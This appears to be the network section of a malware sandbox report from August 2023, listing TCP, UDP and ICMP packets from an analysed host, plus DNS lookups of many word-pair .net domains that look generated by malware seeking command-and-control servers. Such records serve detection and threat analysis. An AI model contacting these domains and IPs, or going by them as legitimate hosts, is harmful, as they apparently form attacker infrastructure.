Aug 8, 2023 16:15:53.620518923 CEST	49703	80	192.168.2.3	52.219.109.72
Aug 8, 2023 16:15:53.747385025 CEST	80	49703	52.219.109.72	192.168.2.3
Aug 8, 2023 16:15:53.747490883 CEST	49703	80	192.168.2.3	52.219.109.72
Aug 8, 2023 16:15:53.747670889 CEST	49703	80	192.168.2.3	52.219.109.72
Aug 8, 2023 16:15:53.875276089 CEST	80	49703	52.219.109.72	192.168.2.3
Aug 8, 2023 16:15:53.904102087 CEST	80	49703	52.219.109.72	192.168.2.3
Aug 8, 2023 16:15:53.904122114 CEST	80	49703	52.219.109.72	192.168.2.3
Aug 8, 2023 16:15:53.904134989 CEST	80	49703	52.219.109.72	192.168.2.3
Aug 8, 2023 16:15:53.904175043 CEST	49703	80	192.168.2.3	52.219.109.72
Aug 8, 2023 16:15:53.904216051 CEST	49703	80	192.168.2.3	52.219.109.72
Aug 8, 2023 16:15:53.904342890 CEST	49703	80	192.168.2.3	52.219.109.72
Aug 8, 2023 16:15:53.919226885 CEST	80	49703	52.219.109.72	192.168.2.3
Aug 8, 2023 16:15:53.921107054 CEST	49703	80	192.168.2.3	52.219.109.72
Aug 8, 2023 16:15:54.031693935 CEST	80	49703	52.219.109.72	192.168.2.3
Aug 8, 2023 16:15:54.265433073 CEST	49704	80	192.168.2.3	69.194.230.123
Aug 8, 2023 16:15:54.415646076 CEST	80	49704	69.194.230.123	192.168.2.3
Aug 8, 2023 16:15:54.421003103 CEST	49704	80	192.168.2.3	69.194.230.123
Aug 8, 2023 16:15:54.433032036 CEST	49704	80	192.168.2.3	69.194.230.123
Aug 8, 2023 16:15:54.582739115 CEST	80	49704	69.194.230.123	192.168.2.3
Aug 8, 2023 16:15:54.584884882 CEST	80	49704	69.194.230.123	192.168.2.3
Aug 8, 2023 16:15:54.584906101 CEST	80	49704	69.194.230.123	192.168.2.3
Aug 8, 2023 16:15:54.584985971 CEST	49704	80	192.168.2.3	69.194.230.123
Aug 8, 2023 16:15:54.585038900 CEST	49704	80	192.168.2.3	69.194.230.123
Aug 8, 2023 16:15:54.734743118 CEST	80	49704	69.194.230.123	192.168.2.3
Aug 8, 2023 16:15:55.729285955 CEST	49705	80	192.168.2.3	72.1.32.168
Aug 8, 2023 16:15:55.918219090 CEST	80	49705	72.1.32.168	192.168.2.3
Aug 8, 2023 16:15:55.918400049 CEST	49705	80	192.168.2.3	72.1.32.168
Aug 8, 2023 16:15:55.918665886 CEST	49705	80	192.168.2.3	72.1.32.168
Aug 8, 2023 16:15:56.108704090 CEST	80	49705	72.1.32.168	192.168.2.3
Aug 8, 2023 16:15:56.108742952 CEST	80	49705	72.1.32.168	192.168.2.3
Aug 8, 2023 16:15:56.108762026 CEST	80	49705	72.1.32.168	192.168.2.3
Aug 8, 2023 16:15:56.108850002 CEST	49705	80	192.168.2.3	72.1.32.168
Aug 8, 2023 16:15:56.109256983 CEST	80	49705	72.1.32.168	192.168.2.3
Aug 8, 2023 16:15:56.109337091 CEST	49705	80	192.168.2.3	72.1.32.168
Aug 8, 2023 16:15:56.109349966 CEST	49705	80	192.168.2.3	72.1.32.168
Aug 8, 2023 16:15:56.297499895 CEST	80	49705	72.1.32.168	192.168.2.3
Aug 8, 2023 16:15:56.451581001 CEST	49706	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:15:56.466101885 CEST	80	49706	34.102.136.180	192.168.2.3
Aug 8, 2023 16:15:56.466200113 CEST	49706	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:15:56.466319084 CEST	49706	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:15:56.480700970 CEST	80	49706	34.102.136.180	192.168.2.3
Aug 8, 2023 16:15:56.873300076 CEST	80	49706	34.102.136.180	192.168.2.3
Aug 8, 2023 16:15:56.873328924 CEST	80	49706	34.102.136.180	192.168.2.3
Aug 8, 2023 16:15:56.873436928 CEST	49706	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:15:56.873584986 CEST	49706	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:15:56.887917995 CEST	80	49706	34.102.136.180	192.168.2.3
Aug 8, 2023 16:15:57.178203106 CEST	49707	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:15:57.201790094 CEST	80	49707	34.102.136.180	192.168.2.3
Aug 8, 2023 16:15:57.201931000 CEST	49707	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:15:57.202012062 CEST	49707	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:15:57.225274086 CEST	80	49707	34.102.136.180	192.168.2.3
Aug 8, 2023 16:15:57.321975946 CEST	80	49707	34.102.136.180	192.168.2.3
Aug 8, 2023 16:15:57.321995020 CEST	80	49707	34.102.136.180	192.168.2.3
Aug 8, 2023 16:15:57.322089911 CEST	49707	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:15:57.322228909 CEST	49707	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:15:57.336932898 CEST	80	49707	34.102.136.180	192.168.2.3
Aug 8, 2023 16:16:02.381733894 CEST	49708	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:16:02.397387981 CEST	80	49708	34.102.136.180	192.168.2.3
Aug 8, 2023 16:16:02.397528887 CEST	49708	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:16:02.397871017 CEST	49708	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:16:02.412642956 CEST	80	49708	34.102.136.180	192.168.2.3
Aug 8, 2023 16:16:02.521969080 CEST	80	49708	34.102.136.180	192.168.2.3
Aug 8, 2023 16:16:02.522000074 CEST	80	49708	34.102.136.180	192.168.2.3
Aug 8, 2023 16:16:02.522110939 CEST	49708	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:16:02.522145033 CEST	49708	80	192.168.2.3	34.102.136.180
Aug 8, 2023 16:16:02.536899090 CEST	80	49708	34.102.136.180	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 8, 2023 16:15:51.534039974 CEST	57990	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:51.555947065 CEST	53	57990	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:51.564692020 CEST	52387	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:51.607868910 CEST	53	52387	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:51.634104967 CEST	56924	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:51.665695906 CEST	53	56924	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:51.673080921 CEST	60625	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:51.715017080 CEST	53	60625	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:51.722526073 CEST	49302	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:51.857624054 CEST	53	49302	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.101263046 CEST	53975	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.130357981 CEST	53	53975	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.220283985 CEST	51139	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.257251024 CEST	53	51139	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.261555910 CEST	52955	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.319463968 CEST	53	52955	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.326603889 CEST	60582	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.362646103 CEST	53	60582	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.371661901 CEST	57134	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.403712034 CEST	53	57134	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.409429073 CEST	62050	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.440176964 CEST	53	62050	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.463985920 CEST	56042	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.522139072 CEST	53	56042	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.525953054 CEST	59636	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.583594084 CEST	53	59636	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.589267015 CEST	55638	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.636969090 CEST	53	55638	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.682919979 CEST	57704	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.717880011 CEST	53	57704	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.748924971 CEST	65320	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.776760101 CEST	53	65320	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.786521912 CEST	60767	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.828730106 CEST	53	60767	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.833539009 CEST	65107	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.869612932 CEST	53	65107	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.874449968 CEST	53848	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.911057949 CEST	53	53848	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.915750027 CEST	57571	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.942621946 CEST	53	57571	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.946881056 CEST	58691	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:52.968308926 CEST	53	58691	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:52.973920107 CEST	53305	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:53.003266096 CEST	53	53305	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:53.007014990 CEST	59433	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:53.036926985 CEST	53	59433	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:53.047035933 CEST	60749	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:53.098716974 CEST	53	60749	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:53.103030920 CEST	56949	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:53.236378908 CEST	53	56949	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:53.478987932 CEST	52547	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:53.515518904 CEST	53	52547	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:53.519726992 CEST	53844	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:53.546859980 CEST	53	53844	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:53.550307035 CEST	65017	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:53.577574968 CEST	53	65017	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:53.581548929 CEST	53466	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:53.619683027 CEST	53	53466	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:53.907743931 CEST	57743	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:53.965981960 CEST	53	57743	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:53.970508099 CEST	53623	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:54.020545006 CEST	53	53623	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:54.037734985 CEST	61416	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:54.264472008 CEST	53	61416	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:54.589346886 CEST	65196	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:54.616844893 CEST	53	65196	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:54.620902061 CEST	58708	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:54.643816948 CEST	53	58708	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:54.648453951 CEST	59581	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:54.696877003 CEST	53	59581	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:54.705033064 CEST	53049	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:54.740170956 CEST	53	53049	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:54.746057034 CEST	60088	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:54.787837029 CEST	53	60088	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:54.791799068 CEST	63562	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:54.830658913 CEST	53	63562	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:54.834914923 CEST	53428	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:54.874140024 CEST	53	53428	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:54.877680063 CEST	65511	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:54.909506083 CEST	53	65511	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:54.913758039 CEST	59820	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:54.952938080 CEST	53	59820	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:54.956618071 CEST	64595	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:55.014853001 CEST	53	64595	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:55.018881083 CEST	52079	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:55.055850983 CEST	53	52079	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:55.070040941 CEST	64823	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:55.113029957 CEST	53	64823	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:55.116827965 CEST	51992	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:55.175005913 CEST	53	51992	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:55.179100990 CEST	58119	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:55.228537083 CEST	53	58119	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:55.232558012 CEST	49166	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:55.728142023 CEST	53	49166	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:56.113485098 CEST	58301	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:56.145334959 CEST	53	58301	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:56.149015903 CEST	63446	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:56.183635950 CEST	53	63446	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:56.191365004 CEST	49874	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:56.232557058 CEST	53	49874	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:56.243444920 CEST	65459	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:56.293519020 CEST	53	65459	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:56.298916101 CEST	65385	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:56.321811914 CEST	53	65385	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:56.326698065 CEST	54153	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:56.355609894 CEST	53	54153	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:56.360399961 CEST	64602	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:56.410767078 CEST	53	64602	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:56.415662050 CEST	50784	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:56.447968006 CEST	53	50784	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:56.877264977 CEST	64121	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:56.905010939 CEST	53	64121	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:56.909451008 CEST	64967	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:56.945487976 CEST	53	64967	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:56.949096918 CEST	60825	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:56.971369982 CEST	53	60825	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:56.976130009 CEST	49201	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:57.025574923 CEST	53	49201	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:57.030236006 CEST	64936	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:57.063654900 CEST	53	64936	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:57.072571039 CEST	60473	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:57.115611076 CEST	53	60473	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:57.136939049 CEST	59374	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:57.177509069 CEST	53	59374	8.8.8.8	192.168.2.3
Aug 8, 2023 16:15:57.325943947 CEST	56616	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:58.341809034 CEST	56616	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:15:59.341006041 CEST	56616	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:01.387918949 CEST	56616	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.342370033 CEST	53	56616	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.347645998 CEST	61184	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.380729914 CEST	53	61184	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.525479078 CEST	57387	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.561981916 CEST	53	57387	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.566646099 CEST	50228	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.594501972 CEST	53	50228	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.600152016 CEST	53269	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.635852098 CEST	53	53269	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.651717901 CEST	59827	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.688293934 CEST	53	59827	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.693319082 CEST	62431	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.752161980 CEST	53	62431	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.756421089 CEST	64271	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.784018040 CEST	53	64271	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.788269997 CEST	51105	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.827753067 CEST	53	51105	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.832012892 CEST	52455	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.855041981 CEST	53	52455	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.859339952 CEST	55244	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.900141954 CEST	53	55244	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.904510975 CEST	64969	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.926839113 CEST	53	64969	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.930903912 CEST	53037	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:02.958982944 CEST	53	53037	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:02.983391047 CEST	55457	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:03.007107019 CEST	53	55457	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:03.011259079 CEST	60816	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:03.038562059 CEST	53	60816	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:03.042972088 CEST	62424	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:03.081995964 CEST	53	62424	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:03.087729931 CEST	61126	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:03.130136013 CEST	53	61126	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:03.134289980 CEST	55390	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:03.192182064 CEST	53	55390	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:03.227195024 CEST	58912	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:03.264305115 CEST	53	58912	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:03.357614040 CEST	53	56616	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:03.453000069 CEST	50622	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:03.489087105 CEST	53	50622	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:03.494240999 CEST	55649	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:03.536451101 CEST	53	55649	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:03.541039944 CEST	64376	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:03.568171978 CEST	53	64376	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:03.572645903 CEST	52110	53	192.168.2.3	8.8.8.8
Aug 8, 2023 16:16:03.622056007 CEST	53	52110	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:04.357141972 CEST	53	56616	8.8.8.8	192.168.2.3
Aug 8, 2023 16:16:06.403779984 CEST	53	56616	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 8, 2023 16:16:03.357702017 CEST	192.168.2.3	8.8.8.8	cff4	(Port unreachable)	Destination Unreachable
Aug 8, 2023 16:16:04.357296944 CEST	192.168.2.3	8.8.8.8	cff4	(Port unreachable)	Destination Unreachable
Aug 8, 2023 16:16:06.403980017 CEST	192.168.2.3	8.8.8.8	cff4	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 8, 2023 16:15:51.534039974 CEST	192.168.2.3	8.8.8.8	0xc2da	Standard query (0)	summerbefore.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:51.564692020 CEST	192.168.2.3	8.8.8.8	0x9fdf	Standard query (0)	crowdbefore.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:51.634104967 CEST	192.168.2.3	8.8.8.8	0x7cf4	Standard query (0)	thoughtsettle.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:51.673080921 CEST	192.168.2.3	8.8.8.8	0xc93a	Standard query (0)	watersettle.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:51.722526073 CEST	192.168.2.3	8.8.8.8	0x2d9e	Standard query (0)	thoughtlanguage.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.101263046 CEST	192.168.2.3	8.8.8.8	0x11c8	Standard query (0)	waterlanguage.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.220283985 CEST	192.168.2.3	8.8.8.8	0x1231	Standard query (0)	thoughtdevice.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.261555910 CEST	192.168.2.3	8.8.8.8	0x4b1c	Standard query (0)	waterdevice.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.326603889 CEST	192.168.2.3	8.8.8.8	0xe81b	Standard query (0)	thoughtbefore.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.371661901 CEST	192.168.2.3	8.8.8.8	0x674e	Standard query (0)	waterbefore.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.409429073 CEST	192.168.2.3	8.8.8.8	0x8f1b	Standard query (0)	womansettle.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.463985920 CEST	192.168.2.3	8.8.8.8	0x287c	Standard query (0)	smokesettle.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.525953054 CEST	192.168.2.3	8.8.8.8	0xcd9	Standard query (0)	womanlanguage.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.589267015 CEST	192.168.2.3	8.8.8.8	0xfe84	Standard query (0)	smokelanguage.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.682919979 CEST	192.168.2.3	8.8.8.8	0x59c3	Standard query (0)	womandevice.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.748924971 CEST	192.168.2.3	8.8.8.8	0xa6b7	Standard query (0)	smokedevice.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.786521912 CEST	192.168.2.3	8.8.8.8	0x74	Standard query (0)	womanbefore.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.833539009 CEST	192.168.2.3	8.8.8.8	0x8e6c	Standard query (0)	smokebefore.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.874449968 CEST	192.168.2.3	8.8.8.8	0xa335	Standard query (0)	partysettle.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.915750027 CEST	192.168.2.3	8.8.8.8	0xede3	Standard query (0)	fightsettle.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.946881056 CEST	192.168.2.3	8.8.8.8	0x118b	Standard query (0)	partylanguage.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:52.973920107 CEST	192.168.2.3	8.8.8.8	0x4fe6	Standard query (0)	fightlanguage.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.007014990 CEST	192.168.2.3	8.8.8.8	0x475d	Standard query (0)	partydevice.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.047035933 CEST	192.168.2.3	8.8.8.8	0x9559	Standard query (0)	fightdevice.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.103030920 CEST	192.168.2.3	8.8.8.8	0x6f24	Standard query (0)	partybefore.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.478987932 CEST	192.168.2.3	8.8.8.8	0xd1c6	Standard query (0)	fightbefore.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.519726992 CEST	192.168.2.3	8.8.8.8	0x98d3	Standard query (0)	freshfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.550307035 CEST	192.168.2.3	8.8.8.8	0xe83c	Standard query (0)	experiencefound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.581548929 CEST	192.168.2.3	8.8.8.8	0xccfc	Standard query (0)	freshspring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.907743931 CEST	192.168.2.3	8.8.8.8	0xf58b	Standard query (0)	experiencespring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:53.970508099 CEST	192.168.2.3	8.8.8.8	0x67e7	Standard query (0)	freshsuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.037734985 CEST	192.168.2.3	8.8.8.8	0x7fb9	Standard query (0)	experiencesuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.589346886 CEST	192.168.2.3	8.8.8.8	0x3ab9	Standard query (0)	freshbanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.620902061 CEST	192.168.2.3	8.8.8.8	0x17d6	Standard query (0)	experiencebanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.648453951 CEST	192.168.2.3	8.8.8.8	0xeec1	Standard query (0)	gentlemanfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.705033064 CEST	192.168.2.3	8.8.8.8	0x56bb	Standard query (0)	alreadyfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.746057034 CEST	192.168.2.3	8.8.8.8	0xee10	Standard query (0)	gentlemanspring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.791799068 CEST	192.168.2.3	8.8.8.8	0x8fc0	Standard query (0)	alreadyspring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.834914923 CEST	192.168.2.3	8.8.8.8	0x5fa8	Standard query (0)	gentlemansuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.877680063 CEST	192.168.2.3	8.8.8.8	0x682	Standard query (0)	alreadysuccess.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.913758039 CEST	192.168.2.3	8.8.8.8	0xc187	Standard query (0)	gentlemanbanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:54.956618071 CEST	192.168.2.3	8.8.8.8	0xf50e	Standard query (0)	alreadybanker.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:55.018881083 CEST	192.168.2.3	8.8.8.8	0x89aa	Standard query (0)	followfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:55.070040941 CEST	192.168.2.3	8.8.8.8	0x63bc	Standard query (0)	memberfound.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:55.116827965 CEST	192.168.2.3	8.8.8.8	0xc41c	Standard query (0)	followspring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:55.179100990 CEST	192.168.2.3	8.8.8.8	0xc59	Standard query (0)	memberspring.net	A (IP address)	IN (0x0001)	false
Aug 8, 2023 16:15:55.232558012 CEST	192.168.2.3	8.8.8.8	0xa3dd	Standard query (0)	followsuccess.net	A (IP address)	IN (0x0001)	false
